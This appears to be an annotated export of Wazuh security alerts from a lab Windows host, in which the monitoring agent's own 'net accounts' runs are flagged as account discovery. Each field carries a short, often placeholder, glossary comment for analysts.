data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:06.6692041Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43899 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534551.2238966 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:29.2811340Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 289977 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:29.257
ProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00}
ProcessId: 664
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:29.257 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be55-680a-1a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534558.2244195 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:36.4109022Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290252 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:36.261
ProcessGuid: {94294ddc-be5c-680a-1c0c-000000000e00}
ProcessId: 11144
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00}
ParentProcessId: 664
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:36.261 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be5c-680a-1c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534559.2249246 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:37.0200822Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290311 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:37.010
ProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00}
ProcessId: 16636
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:37.010 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be5d-680a-1d0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534561.2254483 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:38.6904847Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290435 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:38.616
ProcessGuid: {94294ddc-be5e-680a-1f0c-000000000e00}
ProcessId: 16440
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00}
ParentProcessId: 16636
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:38.616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be5e-680a-1f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
